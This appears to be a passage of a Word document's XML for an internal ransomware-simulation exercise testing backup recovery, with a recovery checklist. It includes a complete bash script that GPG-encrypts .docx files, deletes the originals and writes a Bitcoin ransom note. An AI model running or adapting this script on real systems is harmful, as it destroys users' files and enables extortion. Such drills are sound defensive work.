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360" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Evaluation Task: Backup Recovery Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Document ID:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-{PLACEHOLDER_DATE}-{PLACEHOLDER_INITIALS}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal Use Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_ANALYST_NAME}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Review Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_REVIEW_DATE}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines a controlled security evaluation exercise designed to test the organization's backup recovery procedures and incident response capabilities. The scenario simulates a ransomware attack where an adversary encrypts Microsoft Word documents (.docx) located in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> directory using GNU Privacy Guard (GPG) symmetric encryption. A ransom note is then placed on the Desktop to simulate extortion demands. The primary goal is to assess the effectiveness, speed, and completeness of our backup restoration process without paying any ransom.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Scenario Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The simulated attack involves the following sequence of actions, which must be executed in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>controlled, isolated test environment</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> that mirrors the production user's home directory structure. All actions are to be performed by authorized security personnel only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Encryption Phase:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> A bash script (provided below) will locate all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and encrypt each file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gpg --symmetric --cipher-algo AES256</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. The original files will be replaced with encrypted versions bearing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.gpg</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> extension. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Ransom Note Deployment:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> The script will write a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>RECOVERY_INSTRUCTIONS.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to the Desktop (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) containing a ransom demand for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>0.5 Bitcoin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> in exchange for the decryption key. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recovery Testing:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> The evaluation team will then initiate the backup recovery procedure, restoring the original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files from the most recent verified backup (e.g., via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>rsync</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, or enterprise backup software). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2869" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2869" w:end="2160" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> After restoration, the team will verify file integrity, check for data loss, and document the time required to complete recovery. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Bash Script for Simulated Encryption</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The following script is to be used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>only in the test environment</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. It must be reviewed and approved by the security lead before execution. The script uses a hardcoded passphrase for simulation purposes; in a real attack, this would be randomly generated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="300" w:after="300"/>
        <w:ind w:start="300" w:end="300" w:hanging="0"/>
        <w:rPr>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="E74C3C"/>
          <w:shd w:fill="FDF2E9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="E74C3C"/>
          <w:shd w:fill="FDF2E9" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bdr w:val="single" w:sz="36" w:space="12" w:color="E74C3C"/>
          <w:shd w:fill="FDF2E9" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: This script will encrypt files irreversibly without the passphrase. Ensure backups exist before running. Do not execute on production systems. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:start="180" w:end="180" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # Security Evaluation Script - Simulated Ransomware (DO NOT USE ON PRODUCTION) # Author: {PLACEHOLDER_ANALYST_NAME} # Date: {PLACEHOLDER_DATE} TARGET_DIR="/home/user/Documents" DESKTOP_DIR="/home/user/Desktop" PASSPHRASE="test-evaluation-passphrase-{PLACEHOLDER_ID}" RANSOM_NOTE="$DESKTOP_DIR/RECOVERY_INSTRUCTIONS.txt" BITCOIN_ADDRESS="{PLACEHOLDER_BTC_ADDRESS}" echo "[*] Starting simulated encryption of .docx files in $TARGET_DIR" # Check if target directory exists if [ ! -d "$TARGET_DIR" ]; then echo "[!] Error: Target directory does not exist." exit 1 fi # Encrypt each .docx file using GPG symmetric encryption find "$TARGET_DIR" -type f -name "*.docx" | while read -r file; do echo "[*] Encrypting: $file" gpg --batch --yes --passphrase "$PASSPHRASE" \ --symmetric --cipher-algo AES256 \ --output "${file}.gpg" "$file" if [ $? -eq 0 ]; then echo "[+] Success: ${file}.gpg created" # Remove original file (simulating ransomware behavior) rm -f "$file" echo "[+] Original deleted: $file" else echo "[!] Failed to encrypt: $file" fi done # Write ransom note to Desktop echo "[*] Writing ransom note to $RANSOM_NOTE" cat &gt; "$RANSOM_NOTE" &lt;&lt; EOF ============================================ YOUR FILES HAVE BEEN ENCRYPTED ============================================ All your important documents (.docx) in /home/user/Documents have been locked using military-grade AES256 encryption. To recover your files, you must send exactly 0.5 Bitcoin (BTC) to the following address: Bitcoin Address: $BITCOIN_ADDRESS After payment, contact us at {PLACEHOLDER_EMAIL} with your transaction ID. You will receive the decryption key within 24 hours. Do not attempt to decrypt files yourself. Any modification may result in permanent data loss. You have 72 hours to comply. After that, the decryption key will be destroyed. ============================================ EOF echo "[+] Ransom note created successfully." echo "[*] Simulation complete. Proceed with recovery testing." </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Recovery Procedure Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following table outlines the steps to be taken by the incident response team during the recovery evaluation. Each step must be documented with timestamps and results.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13924" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2746"/>
        <w:gridCol w:w="3616"/>
        <w:gridCol w:w="3616"/>
        <w:gridCol w:w="3946"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Responsible Party</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Isolate affected system from network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Security Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Identify and mount latest verified backup (e.g., from NAS or cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Backup Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Restore </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/home/user/Documents</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> to a temporary directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>System Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Verify file count and integrity (compare checksums)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Security Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Copy restored files back to original location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>System Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3946" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2746" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Remove encrypted </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>.gpg</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> files and ransom note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3616" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="150"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Security Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
